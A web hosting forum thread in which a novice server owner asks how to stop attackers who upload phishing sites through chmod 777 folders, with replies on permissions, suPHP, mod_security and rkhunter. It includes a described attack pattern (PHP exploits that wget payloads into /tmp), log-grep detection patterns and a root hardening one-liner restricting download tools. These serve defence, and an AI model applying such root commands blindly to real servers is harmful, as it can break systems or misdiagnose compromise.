Results 1 to 22 of 22
  1. #1

    urgent -- server hacking...

    hello,
    i have a server and these days my server is hacking by the hacker
    the problem is, chmod 777, there are many dir's with the chmod 777
    and hacker is uploading files and creating folders under the folder
    which is created with chmod 777, now i just want to know how i can
    block the hacker, and is there any way to allow the scripts which in
    my server and not allow any other scripts to upload files in my server

    i have linux server
    please give me replay with full details including commands i dont no much

  2. #2
    Join Date
    Feb 2006
    Location
    Kusadasi, Turkey
    Posts
    3,273
    If you are not experienced with server management, you should hire an admin or a management company.

    Is your server Linux Centos with cPanel?
    Fraud Record - Stop Fraud Clients, Report Abusive Customers.
    █ Combine your efforts to fight misbehaving clients.

    HarzemDesign - Highest quality, well designed and carefully coded hosting designs. Not cheap though.
    █ Large and awesome portfolio, just visit and see!

  3. #3
    Join Date
    Apr 2007
    Location
    zero one zero one zero
    Posts
    1,468
    So the hacker is hacking in how? Via incorrect permissions (NEVER set 777 permissions, run php as CGI with suphp to deal with php permission problems).

    You could use IPtables to block the IP. I'm not about to write a full tutorial on your behalf, google it and learn the lovely linux
    Afterburst - the best unmetered VPS - read why here!

  4. #4
    Quote Originally Posted by Harzem View Post
    If you are not experienced with server management, you should hire an admin or a management company.

    Is your server Linux Centos with cPanel?
    you are right but the issue is i dont have money at this time this month i already lost my much money due to this issue thats why just registered to webhostingtalk i just think here i got the good help

  5. #5
    Join Date
    Feb 2006
    Location
    Kusadasi, Turkey
    Posts
    3,273
    Do you have a one time 30$-50$? Is your server Centos with cPanel?

    To help you, you need to provide us more info about your server.
    Fraud Record - Stop Fraud Clients, Report Abusive Customers.
    █ Combine your efforts to fight misbehaving clients.

    HarzemDesign - Highest quality, well designed and carefully coded hosting designs. Not cheap though.
    █ Large and awesome portfolio, just visit and see!

  6. #6
    Join Date
    Jan 2006
    Location
    Athens, Greece
    Posts
    1,479
    If you are running a open source software like wordpress, updated it to latest version.
    If you have a custom made uploading page... then you need to find someone to
    make it more secure. Or better yet, make it secure.

  7. #7
    Quote Originally Posted by Harzem View Post
    Do you have a one time 30$-50$? Is your server Centos with cPanel?

    To help you, you need to provide us more info about your server.
    50$ is here 4000RS for us and i lost my 20,000rs at this month because i got this issue and my server company blocked me so i change the server company new company is good and they are just sending me reports and i solved at a time but my solution is only deleting files and dir's i want proper solution

    here my server details
    its cpanel
    --
    and CentOS CentOS 5.1-32

  8. #8
    Quote Originally Posted by Steve_Arm View Post
    If you are running a open source software like wordpress, updated it to latest version.
    If you have a custom made uploading page... then you need to find someone to
    make it more secure. Or better yet, make it secure.
    i dont no but i think my clints have uploading scripts thats why they need to change chmod to 777 and if i secure a php script so it can not help because some one told me hacker can not use your php script to upload files and folders, hacker use there own script which is saved in there own server or on a free hosting

  9. #9
    Join Date
    Sep 2005
    Location
    Frankfurt/Germany
    Posts
    29
    Even if your clients need to upload files, there is no need to ever chmod 777. I would suggest to shut down the server to prevent further damage and let some gifted admin take a look at it.
    Managed Rootservers running FreeBSD: Mainlink Internet

  10. #10
    Join Date
    Apr 2007
    Location
    zero one zero one zero
    Posts
    1,468
    You really need to explain the problem some more, because it doesn't quite make sense to me. How exactly are the hackers getting in?
    Afterburst - the best unmetered VPS - read why here!

  11. #11
    Join Date
    May 2002
    Location
    Kingston, Ontario
    Posts
    1,573
    You need to use suPHP or PHPSUEXEC. A shared environment that allows 777 permissions is just asking for trouble.
    Upload Guardian 2 - Malicious Upload Scanner - Windows and Linux!
    Instantly scan uploaded files
    Get notified when released

  12. #12
    Quote Originally Posted by SuperBytes View Post
    You really need to explain the problem some more, because it doesn't quite make sense to me. How exactly are the hackers getting in?
    ok, i have one server i know about basic management, but no idea about security, i just installed firewall updated apache, and installed zend, but this things are not help full.

    now i am on new server i was thinking that hacker can not or cant do in my new server but its doing in new server too, i also try to change the root password but same issue.

    hacker is doing abuse by uploading files on my server,
    hacker upload files to /home/user/public_html/anyfolder
    but every time i just checked that the "anyfolder" chmod is 777.
    hacker can upload and start abuse like creating clone sites of bank.

    but i think hacker use an php script to upload files which is in another server not in my.

  13. #13
    Join Date
    Jul 2007
    Posts
    2,050
    Giving chmod 777 is always a bad idea. You will yourself screw your server.

  14. #14
    in console:

    /scripts/easyapache

    with that you will start an apache compilation , set up your favorites settings , and activate suPHP or phpSUEXEC , save and compile .... it is very easy.....

    When the instalation finish, all folders and files with chmod 777 will not work , will appear an 500 INTERNAL SERVER ERROR , because with suphp you only need the max privilegie chmd 755 <------ only fr all that need write permissions.


    bye !

  15. #15
    Join Date
    Nov 2004
    Location
    Australia
    Posts
    1,683
    And after the above step, run the following command to remove write permission on both directories and files:

    find /home -perm -2 -o -perm -20 | xargs chmod go-w

    Also you can run this fairly safely:

    cd /home
    chgrp nobody */public_html
    chmod o= */public_html


    This will help ensure public_html has the right permissions to allow access to apache and to prevent access by anyone else.

  16. #16
    Join Date
    Nov 2002
    Location
    WebHostingTalk
    Posts
    8,878
    You can take all the advice that has been given to you here and the bottom line is, 48 hours later, you're going to get compromised again.

    If you dont know how to secure your server, you need to hire a security administrator or company to assist you. You cannot expect WHT to fill that role for you.

    If you cant afford this, then return your server to your provider and get out of this business.

    Owning a server is a ton of responsibility. Part of that responsibility is making sure your server is secure, so that the rest of us on the net don't have to deal with exploits and spamming originating from your server.

    Again - hire a company to clean up your server and maintain it's security or close up shop.



    Sirius
    I support the Human Rights Campaign!
    Moving to the Tampa, Florida area? Check out life in the suburbs in Trinity, Florida.

  17. #17
    Join Date
    Dec 2002
    Location
    chica go go
    Posts
    11,858
    install mod_security and a good ruleset. www.gotroot.com has some good ones.

  18. #18
    Join Date
    Jun 2002
    Posts
    1,376
    Quote Originally Posted by asif-iqbal View Post
    hacker is doing abuse by uploading files on my server,
    hacker upload files to /home/user/public_html/anyfolder
    Is it always the same user?

    but i think hacker use an php script to upload files which is in another server not in my.
    This doesn't make sense. An insecure PHP script on another server couldn't affect your server. My guess is that there's a PHP script on one of your clients' sites with a security flaw. Maybe an old version of phpBB, for example. (Or many other things.)

    The typical MO is that 'script kiddies' find an old, insecure PHP application on a server, and exploit it to make it download a file to /tmp and run it. I don't know for sure that this is what's happening, but it's my guess.

    If you keep access logs with Apache (I'm pretty sure that every version of Apache does this by default), you can try something like:
    grep wget /path/to/access_log

    to search for queries involving "wget," a common tool to download scripts. If this returns results, look at what file on your server they're requesting -- it's probably how they're getting in!

    If searching for "wget" doesn't turn up anything, you might also search for "tmp" (since it's common to write to /tmp), but note that "tmp" in and of itself may come up in normal use. And if everything keeps being chmod'ed to 777, try searching for "chmod" (grep chmod /path/to/access_log).

    Do you want to try that and report back if you find anything?

  19. #19
    Join Date
    Jan 2008
    Location
    India
    Posts
    287

    *

    Hello,

    I have given the steps just follow them, If you are still unable to get that working email me.

    EXPLOIT REMOVAL INSTRUCTIONS ON NON-VPS SERVER (Linux/Unix)

    1. Execute the following 3 command lines as root by copy/paste. This will harden files commonly abused to upload exploits and list possible exploits. This script only searches for possible exploits owned by the webserver username, but it is possible that exploits could have been uploaded by a current or previous user account to the searched directories. So, you still need to manually investigate all files in the searched directories even if the script returns no results. Possible exploits found should be investigated and removed followed by rebooting the server to kill any running exploit processes. You can refer to the "xplts" file generated by these commands for later reference.


    sh

    echo -e "\tHARDEN"|tee xplts;for x in `which wget curl fetch lynx links`;do chown -vv 0:0 $x|tee -a xplts;chmod -vv 0550 $x|tee -a xplts;done;echo -e "\n\tSEARCH"|tee -a xplts;for x in "/tmp /var/tmp /dev/shm /usr/local/apache/proxy /var/spool /usr/games";do ls -loAFR $x 2>&-|grep -E "^/| apache | nobody | unknown | www | web | htdocs "|grep -E "^/|^[bcdlsp-]|\.pl$"|grep -Ev "sess_|dos-"|tee -a xplts;done;echo -e "\n\tSUMMARY";echo -e "Block File: \t\t`grep -Ev "^/" xplts|grep -E "^b"|wc -l|tr -d ' '`";echo -e "Character File: \t`grep -Ev "^/" xplts|grep -E "^c"|wc -l|tr -d ' '`";echo -e "Directory: \t\t`grep -Ev "^/" xplts|grep -E "^d"|wc -l|tr -d ' '`";echo -e "Symbolic Link: \t\t`grep -Ev "^/" xplts|grep -E "^l"|wc -l|tr -d ' '`";echo -e "Socket Link: \t\t`grep -Ev "^/" xplts|grep -E "^s"|wc -l|tr -d ' '`";echo -e "FIFO: \t\t\t`grep -Ev "^/" xplts|grep -E "^p"|wc -l|tr -d ' '`";echo -e "Regular File: \t\t`grep -Ev "^/" xplts|grep -E "^-"|wc -l|tr -d ' '`"

    exit


    2. You should also install and run rkhunter
    which is a scanning tool to ensure you for about 99.9% you're clean of rootkits, backdoors, and local exploits. If any rootkits, backdoors, or local exploits are found by rkhunter, you must investigate further and remove them or submit a reload ticket.

    On BSD sytems:
    cd /usr/ports/security/rkhunter; make install clean; rehash; rkhunter -c

    On RedHat, Fedora, CentOS systems:
    yum -y install rkhunter; rkhunter -c

  20. #20
    Join Date
    Nov 2004
    Location
    Australia
    Posts
    1,683
    Quote Originally Posted by servertechs View Post
    Hello,

    I have given the steps just follow them, If you are still unable to get that working email me.
    With his level of expertise, this really isn't going to be enough. I'm with serversphere; he needs to hire someone to harden your system, or give back the server and stop wasting both your time and ours.

    System administration is a skill; just like you wouldn't get an unskilled labourer to build your house, don't expect to be able to run a server without at least some knowledge.

  21. #21
    Join Date
    Jul 2004
    Location
    Athens, Greece
    Posts
    203
    According to the details he provided, he doesn't seem really experienced. So he obviously needs to hire a system administrator to investigate and secure his server, to avoid further trouble. While I really find bad idea to start giving him commands/scripts without knowing the source of his problems.

    Thank you.
    SharkTECH Internet Services
    http://www.sharktech.net
    DDOS Firewalled Dedicated Servers
    Managed Services / IRC Allowed

  22. #22

    * apache web server hardened on linux fc6

    Quote Originally Posted by Harzem View Post
    Do you have a one time 30$-50$? Is your server Centos with cPanel?

    To help you, you need to provide us more info about your server.
    I do have $30 - $50 but I'm quite sure my server will need a bit more work done. we recently got compromised by some phishers and are in need of someone to come in and harden our apache install as well as perhaps continue to perform maintenance on the server in the future. We would also like to know what we can do to continue to prevent this from happening again with changes to our normal procedures.

    Thanks in advance,

    Matt Ball
    PCR

    Server specs:
    Linux "chomped-hostname" 2.6.22.9-61.fc6 #1 SMP Thu Sep 27 17:45:57 EDT 2007 i686 i686 i386 GNU/Linux
    PHP Version: 5.2.4
    Web Server: Apache/2.2.4 (Unix) DAV/2 PHP/5.2.4
    Joomla! Version: Joomla! 1.0.14 RC1 Stable

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •